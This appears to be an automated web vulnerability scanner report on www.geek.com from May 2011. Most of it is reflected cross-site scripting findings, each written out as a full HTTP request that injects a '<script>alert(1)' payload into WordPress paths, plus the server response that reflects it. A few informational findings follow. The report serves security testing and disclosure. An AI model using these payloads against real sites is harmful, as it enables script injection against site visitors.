GET /wp-content42204--><script>alert(1)< Host: www.geek.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=225658124 |
HTTP/1.1 404 Not Found Server: nginx/0.8.53 Content-Type: text/html; charset=UTF-8 X-Powered-By: PHP/5.2.17 Pragma: no-cache Last-Modified: Tue, 10 May 2011 13:51:20 GMT Vary: Cookie X-Pingback: http://www.geek.com Content-Length: 44360 X-Varnish: 1154915462 Vary: Accept-Encoding Cache-Control: no-cache, must-revalidate Expires: Tue, 10 May 2011 13:51:29 GMT Date: Tue, 10 May 2011 13:51:29 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/javascri ...[SNIP]... <!-- www.geek.com /index.php /wp-content42204--><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.geek.com |
Path: | /wp-content/themes/geek6 |
GET /wp-content8d04b--><script>alert(1)< Host: www.geek.com Proxy-Connection: keep-alive Referer: http://www.geek.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: nginx/0.8.53 Content-Type: text/html; charset=UTF-8 X-Powered-By: PHP/5.2.17 Pragma: no-cache Last-Modified: Tue, 10 May 2011 13:24:30 GMT Vary: Cookie X-Pingback: http://www.geek.com Content-Length: 44396 X-Varnish: 924433831 Vary: Accept-Encoding Cache-Control: no-cache, must-revalidate Expires: Tue, 10 May 2011 13:24:14 GMT Date: Tue, 10 May 2011 13:24:14 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/javascri ...[SNIP]... <!-- www.geek.com /index.php /wp-content8d04b--><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.geek.com |
Path: | /wp-content/themes/geek6 |
GET /wp-content/themes5eb8d--><script>alert(1)< Host: www.geek.com Proxy-Connection: keep-alive Referer: http://www.geek.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: nginx/0.8.53 Content-Type: text/html; charset=UTF-8 X-Powered-By: PHP/5.2.17 Pragma: no-cache Last-Modified: Tue, 10 May 2011 13:26:52 GMT Vary: Cookie X-Pingback: http://www.geek.com Content-Length: 44396 X-Varnish: 924434429 Vary: Accept-Encoding Cache-Control: no-cache, must-revalidate Expires: Tue, 10 May 2011 13:26:37 GMT Date: Tue, 10 May 2011 13:26:37 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/javascri ...[SNIP]... <!-- www.geek.com /index.php /wp-content/themes5eb8d--><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.geek.com |
Path: | /wp-content/themes/geek6 |
GET /wp-content/themes/geek6667fc--><script>alert(1)< Host: www.geek.com Proxy-Connection: keep-alive Referer: http://www.geek.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: nginx/0.8.53 Content-Type: text/html; charset=UTF-8 X-Powered-By: PHP/5.2.17 Pragma: no-cache Last-Modified: Tue, 10 May 2011 13:28:33 GMT Vary: Cookie X-Pingback: http://www.geek.com Content-Length: 44324 X-Varnish: 1842939387 Vary: Accept-Encoding Cache-Control: no-cache, must-revalidate Expires: Tue, 10 May 2011 13:28:11 GMT Date: Tue, 10 May 2011 13:28:11 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/javascri ...[SNIP]... <!-- www.geek.com /index.php /wp-content/themes/geek6667fc--><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.geek.com |
Path: | /wp-content/themes/geek6 |
GET /wp-content/themes/geek6 Host: www.geek.com Proxy-Connection: keep-alive Referer: http://www.geek.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: nginx/0.8.53 Content-Type: text/html; charset=UTF-8 X-Powered-By: PHP/5.2.17 Pragma: no-cache Last-Modified: Tue, 10 May 2011 13:30:23 GMT Vary: Cookie X-Pingback: http://www.geek.com Content-Length: 44396 X-Varnish: 924435452 Vary: Accept-Encoding Cache-Control: no-cache, must-revalidate Expires: Tue, 10 May 2011 13:30:07 GMT Date: Tue, 10 May 2011 13:30:07 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/javascri ...[SNIP]... <!-- www.geek.com /index.php /wp-content/themes/geek6 ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.geek.com |
Path: | /wp-content/themes/geek6 |
GET /wp-content73cd2--><script>alert(1)< Host: www.geek.com Proxy-Connection: keep-alive Referer: http://www.geek.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: nginx/0.8.53 Content-Type: text/html; charset=UTF-8 X-Powered-By: PHP/5.2.17 Pragma: no-cache Last-Modified: Tue, 10 May 2011 13:25:53 GMT Vary: Cookie X-Pingback: http://www.geek.com Content-Length: 44366 X-Varnish: 1842938474 Vary: Accept-Encoding Cache-Control: no-cache, must-revalidate Expires: Tue, 10 May 2011 13:25:32 GMT Date: Tue, 10 May 2011 13:25:32 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/javascri ...[SNIP]... <!-- www.geek.com /index.php /wp-content73cd2--><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.geek.com |
Path: | /wp-content/themes/geek6 |
GET /wp-content/themes48dc7--><script>alert(1)< Host: www.geek.com Proxy-Connection: keep-alive Referer: http://www.geek.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: nginx/0.8.53 Content-Type: text/html; charset=UTF-8 X-Powered-By: PHP/5.2.17 Pragma: no-cache Last-Modified: Tue, 10 May 2011 13:27:23 GMT Vary: Cookie X-Pingback: http://www.geek.com Content-Length: 44366 X-Varnish: 1154909827 Vary: Accept-Encoding Cache-Control: no-cache, must-revalidate Expires: Tue, 10 May 2011 13:27:31 GMT Date: Tue, 10 May 2011 13:27:31 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/javascri ...[SNIP]... <!-- www.geek.com /index.php /wp-content/themes48dc7--><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.geek.com |
Path: | /wp-content/themes/geek6 |
GET /wp-content/themes/geek679a85--><script>alert(1)< Host: www.geek.com Proxy-Connection: keep-alive Referer: http://www.geek.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: nginx/0.8.53 Content-Type: text/html; charset=UTF-8 X-Powered-By: PHP/5.2.17 Pragma: no-cache Last-Modified: Tue, 10 May 2011 13:29:32 GMT Vary: Cookie X-Pingback: http://www.geek.com Content-Length: 44366 X-Varnish: 1842939731 Vary: Accept-Encoding Cache-Control: no-cache, must-revalidate Expires: Tue, 10 May 2011 13:29:10 GMT Date: Tue, 10 May 2011 13:29:10 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/javascri ...[SNIP]... <!-- www.geek.com /index.php /wp-content/themes/geek679a85--><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.geek.com |
Path: | /wp-content/themes/geek6 |
GET /wp-content/themes/geek6 Host: www.geek.com Proxy-Connection: keep-alive Referer: http://www.geek.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: nginx/0.8.53 Content-Type: text/html; charset=UTF-8 X-Powered-By: PHP/5.2.17 Pragma: no-cache Last-Modified: Tue, 10 May 2011 13:31:18 GMT Vary: Cookie X-Pingback: http://www.geek.com Content-Length: 44438 X-Varnish: 924435731 Vary: Accept-Encoding Cache-Control: no-cache, must-revalidate Expires: Tue, 10 May 2011 13:31:03 GMT Date: Tue, 10 May 2011 13:31:03 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/javascri ...[SNIP]... <!-- www.geek.com /index.php /wp-content/themes/geek6 ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.geek.com |
Path: | /wp-content/themes/geek6 |
GET /wp-content/themes/geek6 Host: www.geek.com Proxy-Connection: keep-alive Referer: http://www.geek.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: nginx/0.8.53 Content-Type: text/html; charset=UTF-8 X-Powered-By: PHP/5.2.17 Pragma: no-cache Last-Modified: Tue, 10 May 2011 13:32:50 GMT Vary: Cookie X-Pingback: http://www.geek.com Content-Length: 44360 X-Varnish: 1154911283 Vary: Accept-Encoding Cache-Control: no-cache, must-revalidate Expires: Tue, 10 May 2011 13:32:58 GMT Date: Tue, 10 May 2011 13:32:58 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/javascri ...[SNIP]... <!-- www.geek.com /index.php /wp-content/themes/geek6 ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.geek.com |
Path: | /wp-includes/js/jquery |
GET /wp-includes7ca44--><script>alert(1)< Host: www.geek.com Proxy-Connection: keep-alive Referer: http://www.geek.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: nginx/0.8.53 Content-Type: text/html; charset=UTF-8 X-Powered-By: PHP/5.2.17 Pragma: no-cache Last-Modified: Tue, 10 May 2011 13:27:50 GMT Vary: Cookie X-Pingback: http://www.geek.com Content-Length: 44336 X-Varnish: 1154909979 Vary: Accept-Encoding Cache-Control: no-cache, must-revalidate Expires: Tue, 10 May 2011 13:27:59 GMT Date: Tue, 10 May 2011 13:27:59 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/javascri ...[SNIP]... <!-- www.geek.com /index.php /wp-includes7ca44--><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.geek.com |
Path: | /wp-includes/js/jquery |
GET /wp-includes/js9b98a--><script>alert(1)< Host: www.geek.com Proxy-Connection: keep-alive Referer: http://www.geek.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: nginx/0.8.53 Content-Type: text/html; charset=UTF-8 X-Powered-By: PHP/5.2.17 Pragma: no-cache Last-Modified: Tue, 10 May 2011 13:30:27 GMT Vary: Cookie X-Pingback: http://www.geek.com Content-Length: 44333 X-Varnish: 1842939982 Vary: Accept-Encoding Cache-Control: no-cache, must-revalidate Expires: Tue, 10 May 2011 13:30:05 GMT Date: Tue, 10 May 2011 13:30:05 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/javascri ...[SNIP]... <!-- www.geek.com /index.php /wp-includes/js9b98a--><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.geek.com |
Path: | /wp-includes/js/jquery |
GET /wp-includes/js/jqueryb4ff4--><script>alert(1)< Host: www.geek.com Proxy-Connection: keep-alive Referer: http://www.geek.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: nginx/0.8.53 Content-Type: text/html; charset=UTF-8 X-Powered-By: PHP/5.2.17 Pragma: no-cache Last-Modified: Tue, 10 May 2011 13:32:37 GMT Vary: Cookie X-Pingback: http://www.geek.com Content-Length: 44330 X-Varnish: 1842940647 Vary: Accept-Encoding Cache-Control: no-cache, must-revalidate Expires: Tue, 10 May 2011 13:32:16 GMT Date: Tue, 10 May 2011 13:32:16 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/javascri ...[SNIP]... <!-- www.geek.com /index.php /wp-includes/js/jqueryb4ff4--><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.geek.com |
Path: | /wp-includes/js/jquery |
GET /wp-includes/js/jquery Host: www.geek.com Proxy-Connection: keep-alive Referer: http://www.geek.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: nginx/0.8.53 Content-Type: text/html; charset=UTF-8 X-Powered-By: PHP/5.2.17 Last-Modified: Tue, 10 May 2011 13:34:32 GMT Vary: Cookie X-Pingback: http://www.geek.com Content-Length: 44336 X-Varnish: 1842941134 Expires: Tue, 10 May 2011 13:34:11 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Tue, 10 May 2011 13:34:11 GMT Connection: close Vary: Accept-Encoding Set-Cookie: PHPSESSID=7c0ba0f868 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/javascri ...[SNIP]... <!-- www.geek.com /index.php /wp-includes/js/jquery ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.geek.com |
Path: | /wp-includes/js/l10n.js |
GET /wp-includesa4d53--><script>alert(1)< Host: www.geek.com Proxy-Connection: keep-alive Referer: http://www.geek.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: nginx/0.8.53 Content-Type: text/html; charset=UTF-8 X-Powered-By: PHP/5.2.17 Pragma: no-cache Last-Modified: Tue, 10 May 2011 13:27:58 GMT Vary: Cookie X-Pingback: http://www.geek.com Content-Length: 44318 X-Varnish: 1842939193 Vary: Accept-Encoding Cache-Control: no-cache, must-revalidate Expires: Tue, 10 May 2011 13:27:36 GMT Date: Tue, 10 May 2011 13:27:36 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/javascri ...[SNIP]... <!-- www.geek.com /index.php /wp-includesa4d53--><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.geek.com |
Path: | /wp-includes/js/l10n.js |
GET /wp-includes/jsd5258--><script>alert(1)< Host: www.geek.com Proxy-Connection: keep-alive Referer: http://www.geek.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: nginx/0.8.53 Content-Type: text/html; charset=UTF-8 X-Powered-By: PHP/5.2.17 Pragma: no-cache Last-Modified: Tue, 10 May 2011 13:29:37 GMT Vary: Cookie X-Pingback: http://www.geek.com Content-Length: 44318 X-Varnish: 1154910460 Vary: Accept-Encoding Cache-Control: no-cache, must-revalidate Expires: Tue, 10 May 2011 13:29:46 GMT Date: Tue, 10 May 2011 13:29:46 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/javascri ...[SNIP]... <!-- www.geek.com /index.php /wp-includes/jsd5258--><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.geek.com |
Path: | /wp-includes/js/l10n.js |
GET /wp-includes/js/l10n.js4bc2b--><script>alert(1)< Host: www.geek.com Proxy-Connection: keep-alive Referer: http://www.geek.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: nginx/0.8.53 Content-Type: text/html; charset=UTF-8 X-Powered-By: PHP/5.2.17 Last-Modified: Tue, 10 May 2011 13:31:42 GMT Vary: Cookie X-Pingback: http://www.geek.com Content-Length: 44318 X-Varnish: 1154911041 Expires: Tue, 10 May 2011 13:31:51 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Tue, 10 May 2011 13:31:51 GMT Connection: close Vary: Accept-Encoding Set-Cookie: PHPSESSID=64cb2cb3f7 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/javascri ...[SNIP]... <!-- www.geek.com /index.php /wp-includes/js/l10n.js4bc2b--><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.geek.com |
Path: | /articles/geek-pick |
GET /articles/geek-pick Host: www.geek.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: text/html; charset=UTF-8 X-Powered-By: PHP/5.2.17 Last-Modified: Tue, 10 May 2011 13:21:36 GMT Vary: Cookie X-Pingback: http://www.geek.com X-Varnish: 1842937612 1842937605 Vary: Accept-Encoding Expires: Tue, 10 May 2011 13:22:33 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Tue, 10 May 2011 13:22:33 GMT Connection: close Content-Length: 56377 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/javascri ...[SNIP]... <div class="loginBox"> <form name="login" method="post" action="http://www.geek <div> ...[SNIP]... <input name="user_login" type="text" id="user_login" class="text" maxlength="40" value="" /> Password: <input name="password" type="password" id="password" class="text" maxlength="40" /> </div> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.geek.com |
Path: | /articles/geek-pick |
GET /articles/geek-pick Host: www.geek.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: text/html; charset=UTF-8 X-Powered-By: PHP/5.2.17 Last-Modified: Tue, 10 May 2011 13:21:36 GMT Vary: Cookie X-Pingback: http://www.geek.com X-Varnish: 1842937612 1842937605 Vary: Accept-Encoding Expires: Tue, 10 May 2011 13:22:33 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Tue, 10 May 2011 13:22:33 GMT Connection: close Content-Length: 56377 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/javascri ...[SNIP]... <div class="loginBox"> <form name="login" method="post" action="http://www.geek <div> ...[SNIP]... <input name="user_login" type="text" id="user_login" class="text" maxlength="40" value="" /> Password: <input name="password" type="password" id="password" class="text" maxlength="40" /> </div> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.geek.com |
Path: | /articles/geek-pick |
GET /articles/geek-pick Host: www.geek.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: text/html; charset=UTF-8 X-Powered-By: PHP/5.2.17 Last-Modified: Tue, 10 May 2011 13:21:36 GMT Vary: Cookie X-Pingback: http://www.geek.com X-Varnish: 1842937612 1842937605 Vary: Accept-Encoding Expires: Tue, 10 May 2011 13:22:33 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Tue, 10 May 2011 13:22:33 GMT Connection: close Content-Length: 56377 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/javascri ...[SNIP]... </script> <script language="JavaScript" src="http://common ...[SNIP]... </div> <script type="text/javascript" src="http://redux.com <!-- start Vibrant Media IntelliTXT script section --> <script type="text/javascript" src="http://geek.us ...[SNIP]... </style> <script type="text/javascript" src="http://www ...[SNIP]... </div> <script type='text/javascript' src='http://w.sharethis ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.geek.com |
Path: | /articles/geek-pick |
GET /robots.txt HTTP/1.0 Host: www.geek.com |
HTTP/1.0 200 OK Server: nginx/0.8.53 Content-Type: text/plain Last-Modified: Wed, 04 May 2011 19:31:15 GMT Content-Length: 92 X-Varnish: 1153152398 Cache-Control: max-age=26953 Expires: Tue, 10 May 2011 20:51:50 GMT Date: Tue, 10 May 2011 13:22:37 GMT Connection: close User-agent: * Disallow: /users/ Disallow: /portable/ Disallow: /search/* Disallow: /search/ |
Severity: | Information |
Confidence: | Firm |
Host: | http://www.geek.com |
Path: | /wp-content/themes/geek6 |
GET /wp-content/themes/geek6 Host: www.geek.com Proxy-Connection: keep-alive Referer: http://www.geek.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: text/html; charset=UTF-8 X-Powered-By: PHP/5.2.17 Pragma: no-cache X-Varnish: 1154646917 Vary: Accept-Encoding Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0 Expires: Tue, 10 May 2011 13:14:11 GMT Date: Tue, 10 May 2011 13:14:11 GMT Connection: close Content-Length: 6416 function add_favourite_post(post $.post("http://www.geek { action: "add_favourite_post", post_id: post_id }, function(data) { ...[SNIP]... |
Severity: | Information |
Confidence: | Firm |
Host: | http://www.geek.com |
Path: | /wp-content/themes/geek6 |
GET /wp-content/themes/geek6 Host: www.geek.com Proxy-Connection: keep-alive Referer: http://www.geek.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: text/html; charset=UTF-8 X-Powered-By: PHP/5.2.17 Pragma: no-cache X-Varnish: 1154904894 Vary: Accept-Encoding Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0 Expires: Tue, 10 May 2011 13:14:10 GMT Date: Tue, 10 May 2011 13:14:10 GMT Connection: close Content-Length: 8890 function getElementsByClassName var arrElements = (strTagName == "*" && oElm.all)? oElm.all : oElm.getElementsByTagName var arrReturnElements = new Arra ...[SNIP]... |
Severity: | Information |
Confidence: | Firm |
Host: | http://www.geek.com |
Path: | /wp-content/themes/geek6 |
GET /wp-content/themes/geek6 Host: www.geek.com Proxy-Connection: keep-alive Referer: http://www.geek.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: text/html; charset=UTF-8 X-Powered-By: PHP/5.2.17 Pragma: no-cache X-Varnish: 924168324 Vary: Accept-Encoding Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0 Expires: Tue, 10 May 2011 13:14:12 GMT Date: Tue, 10 May 2011 13:14:12 GMT Connection: close Content-Length: 754 var req; function init_ajax_search(obj) { if(req != null) req.abort(); if($("#search_input").val $("#searchpopup").show( ...[SNIP]... |